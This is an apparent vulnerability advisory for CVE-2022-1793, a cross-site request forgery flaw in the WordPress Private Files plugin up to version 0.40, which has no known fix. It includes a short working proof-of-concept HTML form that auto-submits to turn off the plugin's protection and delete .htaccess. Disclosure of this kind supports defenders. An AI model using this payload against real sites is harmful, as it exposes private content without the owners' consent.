Private Files <= 0.40 – Protection Disabling via CSRF | CVE 2022-1793 | Plugin Vulnerabilities

Description

The plugin is missing CSRF check when disabling the protection, which could allow attackers to make a logged in admin perform such action via a CSRF attack and make the blog public

Proof of Concept

<form id="test" action="https://example.com/wp-admin/tools.php?page=privatefiles.php" method="POST">
    <input type="text" name="level" value="-1">
    <input type="text" name="unprotect" value="Unprotect">
    <input type="text" name="submit" value="true">
</form>
<script>
    document.getElementById("test").submit();
</script>

That will also delete the .htaccess

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

fd8b84b4-6944-4638-bdc1-1cb6aaabd42c

Timeline

Publicly Published

2022-05-23 (about 3 years ago)

Added

2022-05-23 (about 3 years ago)

Last Updated

2023-02-16 (about 2 years ago)

Other

Published

Title

Published

2016-04-12

Title

WordPress <= 4.4.2 - Script Compression Option CSRF

Published

2025-04-09

Title

Interactive US Map <= 2.7 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2023-02-02

Title

Multi Rating < 5.0.6 - Ratings Deletion via CSRF

Published

2024-04-05

Title

Transcoder < 1.3.6 - Cross-Site Request Forgery

Published

2025-03-31

Title

Varnish WordPress <= 1.7 - Cross-Site Request Forgery to Stored Cross-Site Scripting